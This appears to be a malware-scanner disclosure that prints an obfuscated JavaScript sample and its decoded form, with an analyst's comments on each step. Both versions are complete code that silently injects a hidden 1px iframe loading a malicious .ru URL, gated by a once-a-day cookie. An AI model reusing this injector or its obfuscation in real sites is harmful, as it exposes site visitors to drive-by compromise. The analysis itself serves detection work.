
Quttera web malware scanner detected malicious obfuscated JS

a guest Jul 27th, 2013 84 Never
  1. /*
  2.  * Quttera web malware scanner detected obfuscated JavaScript code that injects a malicious hidden iframe
  3.  */
  4.  
  5. /*
  6.  * original threat
  7.  */
  8. d = "doc" + "ument"; // Analyst note: builds the string "document" from two fragments so the literal never appears; it is passed to the eval alias `e` further down.
  9. try {
  10.     ++document.body // The decoder `aa` exists only if this statement throws (it is defined in the catch handler). NOTE(review): presumably a check against analysis environments whose DOM stubs do not throw here - confirm.
  11. } catch (q) {
  12.     aa = function (ff) { // Decoder: `ff` is a String method name given as text; the only call visible in this listing passes "fromCharCode".
  13.         for (i = 0; i < z.length; i++) { // Walks the token array held in the global `z` (implicit globals throughout).
  14.             za += String[ff](e(v + (z[i])) - 12); // Per token: eval("0x" + token) yields a number, 12 is subtracted, and the resulting character is appended to the global `za`.
  15.         }
  16.     };
  17. };
  18. ps = "split"; // Method name kept as a string and invoked with bracket syntax on the encoded payload, so no literal `.split(` call appears.
  19. e = (eval); // Alias for eval; calling it through the alias is an indirect eval (global scope). Aliased eval is a useful detection trait for this sample.
  20. v = "0x"; // Hex prefix prepended to every token before it is evaluated.
  21. a = 0; // Flag tested by the `if (!a)` that follows.
  22. z = "y"; // First used as the trailing "y" of "bod" + z, later overwritten with the token array.
  23. try {; // The try body holds only an empty statement, so the catch below cannot run and `a` stays 0.
  24. } catch (zz) {
  25.     a = 1
  26. }
  27. if (!a) { // Analyst note: `a` is still 0 at this point, so this branch always executes.
  28.     try {
  29.         ++e(d)["bod" + z] // Same `++document.body` expression as above, reached through eval("document")["body"].
  30.     } catch (q) {
  31.         a2 = "_"; // The split delimiter is assigned only inside the catch handler, so decoding again depends on the statement above throwing.
  32.     }
          // Encoded payload: hex tokens joined by "_"; each token minus 12 is a character code
          // (e.g. the leading tokens 2c_72_81_7a_6f_80_75_7b_7a decode to " function").
          // NOTE(review): the literal is wrapped across three lines in this listing - presumably a
          // paste/extraction artefact, since a JavaScript string literal cannot contain raw line breaks.
  33.     z = "2c_72_81_7a_6f_80_75_7b_7a_2c_86_86_86_72_72_72_34_35_2c_87_19_16_2c_82_6d_7e_2c_76_6d_70_7e_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7e_71_6d_80_71_51_78_71_79_71_7a_80_34_33_75_72_7e_6d_79_71_33_35_47_19_16_19_16_2c_76_6d_70_7e_3a_7f_7e_6f_2c_49_2c_33_74_80_80_7c_46_3b_3b_6f_6d_72_71_78_81_79_3a_7e_81_3b_80_79_7c_3b_40_42_7a_7d_75_86_78_7f_3a_7c_74_7c_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_7c_7b_7f_75_80_75_7b_7a_2c_49_2c_33_6d_6e_7f_7b_78_81_80_71_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_6e_7b_7e_70_71_7e_2c_49_2c_33_3c_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_74_71_75_73_74_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_83_75_70_80_74_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_78_71_72_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_80_7b_7c_2c_49_2c_33_3d_7c_84_33_47_19_16_19_16_2c_75_72_2c_34_2d_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_76_6d_70_7e_33_35_35_2c_87_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_83_7e_75_80_71_34_33_48_70_75_82_2c_75_70_49_68_33_76_6d_70_7e_68_33_4a_48_3b_70_75_82_4a_33_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_76_6d_70_7e_33_35_3a_6d_7c_7c_71_7a_70_4f_74_75_78_70_34_76_6d_70_7e_35_47_19_16_2c_89_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_5f_71_80_4f_7b_7b_77_75_71_34_6f_7b_7b_77_75_71_5a_6d_79_71_38_6f_7b_7b_77_75_71_62_6d_78_81_71_38_7a_50_6d_85_7f_38_7c_6d_80_74_35_2c_87_19_16_2c_82_6d_7e_2c_80_7b_70_6d_85_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_82_6d_7e_2c_71_84_7c_75_7e_71_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_75_72_2c_34_7a_50_6d_85_7f_49_49_7a_81_78_78_2c_88_88_2c_7a_50_6d_85_7f_49_49_3c_35_2c_7a_50_6d_85_7f_49_3d_47_19_16_2c_71_84_7c_75_7e_71_3a_7f_71_80_60_75_79_71_34_80_7b_70_6d_85_3a_73_71_80_60_75_79_71_34_35_2c_37_2c_3f_42_3c_3c_3c_3c_3c_36_3e_40_36_7a_50_6d_85_7f_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77
_75_71_2c_49_2c_6f_7b_7b_77_75_71_5a_6d_79_71_37_2e_49_2e_37_71_7f_6f_6d_7c_71_34_6f_7b_7b_77_75_71_62_6d_78_81_71_35_19_16_2c_37_2c_2e_47_71_84_7c_75_7e_71_7f_49_2e_2c_37_2c_71_84_7c_75_7e_71_3a_80_7b_53_59_60_5f_80_7e_75_7a_73_34_35_2c_37_2c_34_34_7c_6d_80_74_35_2c_4b_2c_2e_47_2c_7c_6d_80_74_49_2e_2c_37_2c_7c_6d_80_74_2c_46_2c_2e_2e_35_47_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_53_71_80_4f_7b_7b_77_75_71_34_2c_7a_6d_79_71_2c_35_2c_87_19_16_2c_82_6d_7e_2c_7f_80_6d_7e_80_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_7a_6d_79_71_2c_37_2c_2e_49_2e_2c_35_47_19_16_2c_82_6d_7e_2c_78_71_7a_2c_49_2c_7f_80_6d_7e_80_2c_37_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_37_2c_3d_47_19_16_2c_75_72_2c_34_2c_34_2c_2d_7f_80_6d_7e_80_2c_35_2c_32_32_19_16_2c_34_2c_7a_6d_79_71_2c_2d_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_3c_38_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_35_2c_35_2c_35_19_16_2c_87_19_16_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_89_19_16_2c_75_72_2c_34_2c_7f_80_6d_7e_80_2c_49_49_2c_39_3d_2c_35_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_82_6d_7e_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_2e_47_2e_38_2c_78_71_7a_2c_35_47_19_16_2c_75_72_2c_34_2c_71_7a_70_2c_49_49_2c_39_3d_2c_35_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_78_71_7a_73_80_74_47_19_16_2c_7e_71_80_81_7e_7a_2c_81_7a_71_7f_6f_6d_7c_71_34_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_78_71_7a_38_2c_71_7a_70_2c_35_2c_35_47_19_16_89_19_16_75_72_2c_34_7a_6d_82_75_73_6d_80_7b_7e_3a_6f_7b_7b_77_75_71_51_7a_6d_6e_78_71_70_35_19_16_87_19_16_75_72_34_53_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_35_49_49_41_41_35_87_89_71_78_7f_71_87_5f_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_38_2c_33_41_41_33_38_2c_33_3d_33_38_2c_33_3b_33_35_47_19_16_19_16_86_86_86_72_72_72_34_35_47_19_16_89_19_1
6_89_19_16" [ps](a2); // Equivalent to "<payload>".split("_"): `z` becomes the array of hex tokens.
  34.     za = ""; // Accumulator that the decoder `aa` appends to.
  35.     aa("fromCharCode"); // Decodes every token via String.fromCharCode(eval("0x" + token) - 12).
  36.     zaz = za;
  37.     e(zaz); // Executes the decoded text through the eval alias. For analysis, capture the string at this point instead of executing it, and only inside an isolated environment.
  38. }
  39.  
  40.  
  41. /*
  42.  * deobfuscated code that injects a hidden iframe pointing to http://cafelum[.]ru/tmp/46nqizls.php
  43.  */
  44. function zzzfff() { // Analyst note: decoded payload entry point - builds an iframe and attaches it to the page once.
  45.     var jadr = document.createElement('iframe');
  46.     jadr.src = 'http://cafelum.ru/tmp/46nqizls.php'; // Remote URL loaded by the frame - the network indicator for this sample (shown live here, defanged in the header comment).
  47.     jadr.style.position = 'absolute'; // Absolute positioning, no border and a 1px by 1px box at offset (1px, 1px): the frame is effectively invisible to the visitor.
  48.     jadr.style.border = '0';
  49.     jadr.style.height = '1px';
  50.     jadr.style.width = '1px';
  51.     jadr.style.left = '1px';
  52.     jadr.style.top = '1px';
  53.  
  54.  
  55.  
  56.     if (!document.getElementById('jadr')) { // Runs only when no element with id 'jadr' exists yet, so the frame is added at most once per page.
  57.         document.write('<div id=\'jadr\'></div>'); // Writes a container div with id 'jadr' into the document; that id is a DOM-side indicator when triaging an affected page.
  58.         document.getElementById('jadr').appendChild(jadr); // Attaching the iframe triggers the request to the remote URL. A Content-Security-Policy frame-src restriction on the site would limit which origins can be framed.
  59.     }
  60. }
  61.  
  62. function SetCookie(cookieName, cookieValue, nDays, path) { // Analyst note: writes a cookie that expires nDays days from now, with an optional path attribute.
  63.     var today = new Date();
  64.     var expire = new Date();
  65.     if (nDays == null || nDays == 0) nDays = 1; // Loose comparisons: null, undefined and 0 all fall back to a lifetime of one day.
  66.     expire.setTime(today.getTime() + 3600000 * 24 * nDays); // 3600000 ms per hour * 24 * nDays; a numeric string such as '1' is coerced by the multiplication.
  67.     document.cookie = cookieName + "=" + escape(cookieValue) // Value is passed through the legacy escape() function.
  68.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); // The path attribute is appended only when `path` is truthy.
  69. }
  70.  
  71.  
  72. function GetCookie(name) { // Analyst note: returns the unescaped value stored under `name` in document.cookie, or null when "name=" is not found.
  73.     var start = document.cookie.indexOf(name + "="); // Plain substring search, so it also matches a cookie whose name merely ends with `name`.
  74.     var len = start + name.length + 1; // Index of the first character after "name=".
  75.     if ((!start) && // NOTE(review): when start is 0 the cookie string already begins with `name`, so this branch looks unreachable - confirm.
  76.         (name != document.cookie.substring(0, name.length)))
  77.     {
  78.         return null;
  79.     }
  80.  
  81.     if (start == -1) return null; // Not present.
  82.     var end = document.cookie.indexOf(";", len); // The value runs to the next ";" or, failing that, to the end of the cookie string.
  83.     if (end == -1) end = document.cookie.length;
  84.     return unescape(document.cookie.substring(len, end));
  85. }
  86.  
  87.  
  88. if (navigator.cookieEnabled) // Analyst note: the injection below runs only when the browser reports cookies as enabled.
  89. {
  90.  
  91.     /* If the 'visited_uq' cookie already holds 55, do nothing: this visitor was
  92.      * served the iframe within the cookie's lifetime. Otherwise set the cookie
  93.      * for one day on path '/' and inject the hidden iframe.
  94.      * Triage note: because of this once-per-day gate, a scanner or crawler that
  95.      * keeps cookies between visits will not see the iframe again; re-test with
  96.      * an empty cookie jar. A 'visited_uq=55' cookie in a browser is a host-side
  97.      * indicator that this branch has already run for the site.
  98.      */
  94.     if (GetCookie('visited_uq') == 55) {} else { // Loose equality: the string "55" returned by GetCookie matches the number 55.
  95.         SetCookie('visited_uq', '55', '1', '/');
  96.         zzzfff();
  97.     }
  98. }